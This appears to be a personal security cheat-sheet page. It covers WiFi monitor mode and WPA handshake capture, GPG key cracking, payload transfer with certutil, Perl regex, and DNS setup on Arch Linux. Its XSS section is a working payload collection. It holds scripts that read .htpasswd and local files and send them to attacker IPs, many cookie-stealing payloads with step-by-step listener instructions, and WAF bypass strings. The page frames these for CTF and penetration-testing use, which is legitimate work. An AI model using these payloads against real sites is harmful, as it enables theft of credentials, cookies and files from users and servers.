Security

Airmon-ng To start monitoring mode on wlan0: sudo airmon-ng start wlan0 iwconfig To enable monitor mode using iwconfig: sudo ifconfig [INTERFACE] down sudo iwconfig [INTERFACE] mode monitor sudo ifconfig [INTERFACE] up iw To enable monitor mode using iw: sudo ip link set [INTERFACE] down sudo iw [INTERFACE] set monitor control sudo ip link set [INTERFACE] up Adding a New Monitor Interface To add a new monitor interface: sudo iw [INTERFACE] interface add [NEW_INTERFACE] type monitor Aircrack-ng Installation To install aircrack-ng: sudo apt-get update sudo apt-get install aircrack-ng Airmon-ng Commands To use airmon-ng commands: ...

To see available keys in your system $ gpg --list-secret-keys If you have a backup.gpg keys with encrypted format. Then you need a key to decode it. If you found the key in some file. Then simple import that file in your syste $ gpg --import private.asc If the private.asc file is in encrypted format then they ask password to decrypt and import to our system. we can also crack private.asc key by extracting hash from it by using john ...

Method 1: Using an HTTP Server Step 1: Start an HTTP server on Linux Open a terminal on your Linux machine and run: sudo python3 -m http.server 80 Step 2: Download the file using certutil on Windows Open Command Prompt or PowerShell on your Windows machine and run: certutil.exe -urlcache -split -f "http://10.10.14.7/msf.exe" Method 2: Using Invoke-WebRequest Step 1: Start an HTTP server on Linux Same as Step 1 in Method 1. Step 2: Download the file using Invoke-WebRequest on Windows Open PowerShell on your Windows machine and run: ...

Perl provides powerful operators for manipulating strings using regular expressions. Here’s a breakdown of each operator with examples: s/// (Substitution Operator) Syntax: s/old-pattern/new-pattern/ Purpose: Replaces occurrences of old-pattern with new-pattern in a string. Example: s/John/Doe/ replaces the first instance of “John” with “Doe”. Example 1: Replace “John” with “Doe” text = "Hello John. John is a friend."; regex = s/John/Doe/; # Result: "Hello Doe. John is a friend." Example 2: Replace “white” with “black” ...

🔍 1. Scan Available WiFi Networks 🌐 Scan all nearby WiFi networks sudo airodump-ng mon0 📶 Scan only 2.4 GHz networks (802.11b/g) sudo airodump-ng --band bg mon0 📡 Scan only 5 GHz networks (802.11a) sudo airodump-ng --band a mon0 📋 Band Option Summary --band a → 5 GHz (802.11a) --band b → 2.4 GHz (802.11b) --band g → 2.4 GHz (802.11g) --band bg → All 2.4 GHz (recommended) --band abg → Both 2.4 GHz and 5 GHz 🎯 2. Capture WPA/WPA2 Handshake 🎯 Start listening on target AP # Replace <channel>, <BSSID>, and <output_filename> sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_filename> mon0 Example ...

1. Steal File Content Using Inline XSS Script (HTML) <script> fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd") .then(response => response.text()) .then(data => { fetch("http://10.10.14.228/?data=" + encodeURIComponent(data)); }) .catch(error => console.error("Error fetching the messages:", error)); </script> Explanation: This script tries to read the .htpasswd file from a vulnerable server using a local file inclusion (LFI) or file read vulnerability in the URL parameter file. Then, it sends the stolen file content back to your attacker server (10.10.14.228) using an HTTP request with the data URL-encoded. Works in XSS vulnerable pages where you can inject JS. How to use: Inject this script into an XSS vulnerable parameter or stored XSS vector. Make sure your attacker machine (10.10.14.228) is ready to receive GET requests and log the data parameter. Example listener (using nc or a simple Python HTTP server) to capture data: nc -lvnp 80 # or python3 -m http.server 80 2. External JS File to Steal File Content via XSS (JavaScript) // Usage: // Spawn python HTTP server on attacker box: python3 -m http.server 1212 // Inject in vulnerable page: <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script> var url = "http://127.0.0.1/dir/pass.txt"; // Target file on victim var attacker = "http://10.9.179.230:1212/steal_page_content_xss.js"; var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { // send base64 encoded stolen content to attacker server fetch(attacker + "?" + encodeURI(btoa(xhr.responseText))) } } xhr.open('GET', url, true); xhr.send(null); Explanation: This script fetches a local file on the victim machine (http://127.0.0.1/dir/pass.txt) via the victim’s browser. When the file is fully loaded (DONE), it encodes the content in Base64 (btoa) to safely transmit binary or special characters. Then sends this encoded content back to attacker server by requesting the script file with data as query string (?data=...). Requires you to host this script on your attacker machine (10.9.179.230) and have an HTTP server running on port 1212. How to use: Start HTTP server on attacker box: python3 -m http.server 1212 Inject <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script> into an XSS vulnerable page. Monitor requests on your attacker server to capture the Base64 encoded file contents in the URL. Decode captured Base64 content: echo "base64_encoded_string" | base64 -d > stolen_file.txt Summary Notes: These methods depend on the target browser having access to local files via URL paths (like 127.0.0.1) or vulnerable parameters (LFI). Base64 encoding helps send files safely in GET requests. Must have control over attacker server to catch stolen data. Use during CTF challenges, penetration testing, or in controlled environments. Always check the same-origin policy and CORS restrictions which may block requests in real-world targets.

🎯 Basic Payloads <svg/onload="alert(document.cookie)"> <iframe src="data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpIiAvPgo8L3N2Zz4="></iframe> <script>var i=new Image(); i.src="http://10.10.14.54/?cookie="+btoa(document.cookie);</script> <script>var i=new Image;i.src="http://10.10.14.7:8888/?cookie="+document.cookie;</script> <script> document.write('<img src="http://10.10.14.54/?cookie='+document.cookie+'" />'); </script> <img src/onerror=this.src="http://10.10.14.74/?cookie="+btoa(document.cookie)> <img src="http://10.10.14.54/" onload="var i=0;if(i++)this.src+='?cookie='+encodeURIComponent(document.cookie);"/> <script>fetch('http://10.10.14.19:8000/?cookie=' + btoa(document.cookie));</script> 🧨 Local File Access / Script Injection <img src=xasdasdasd onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/> <img src=gdgdgdfgert onerror="document.write('<script src=http://127.0.0.1/test.js></script>')"/> <img src=x onerror=fetch('http://10.10.xx.xx/?cookie='+document.cookie);> 🕵️‍♂️ WAF Bypass Strings for XSS <Img src = x onerror = "javascript: window.onerror = alert; throw XSS"> <Video> <source onerror = "javascript: alert (XSS)"> <Input value = "XSS" type = text> <applet code="javascript:confirm(document.cookie);"> <isindex x="javascript:" onmouseover="alert(XSS)"> "></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> "><img src="x:x" onerror="alert(XSS)"> "><iframe src="javascript:alert(XSS)"> <object data="javascript:alert(XSS)"> <isindex type=image src=1 onerror=alert(XSS)> <img src=x:alert(alt) onerror=eval(src) alt=0> <img src="x:gif" onerror="window "></img> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert(1)">X </script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'> <style>//*{x:expression(alert(/xss/))}//<style></style> 📚 Resources 🔗 OWASP XSS Filter Evasion Cheat Sheet ...

First of all, check openresolv package is installed in your system or not. if not then simply install it by: sudo pacman -S extra/openresolv Step 2: Remove Immutable Permissions # Check for immutable permissions on /etc/resolv.conf lsattr /etc/resolv* # If immutable permissions exist, them remove it by sudo chattr -i /etc/resolv.conf Step 3: Set Custom DNS Servers # Edit the resolvconf.conf file sudo nano /etc/resolvconf.conf # Configuration for resolvconf(8) # See resolvconf.conf(5) for details resolv_conf=/etc/resolv.conf # If you run a local name server, you should uncomment the below line and # configure your subscribers configuration files below. #name_servers=127.0.0.1 ###### Block malware with 1.1.1.1 for Families ##### name_servers=1.0.0.2 name_servers=1.1.1.2 ###### Use 1.1.1.1 resolver ###### name_servers=1.0.0.1 name_servers=1.1.1.1 ###### AdGuard DNS ###### # name_servers=94.140.14.59 # name_servers=94.140.14.49 ######### AdGuard Non-filtering DNS ####### name_servers=94.140.14.141 name_servers=94.140.14.140 Enable dhcpcd services to work Custom DNS. if it is not installed in your system then install it by sudo pacman -S extra/dhcpcd sudo systemctl enable --now dhcpcd.service Conclusion: You’ve successfully configured custom DNS servers on Arch based Linux. Enjoy improved network security and privacy with your chosen DNS servers. ...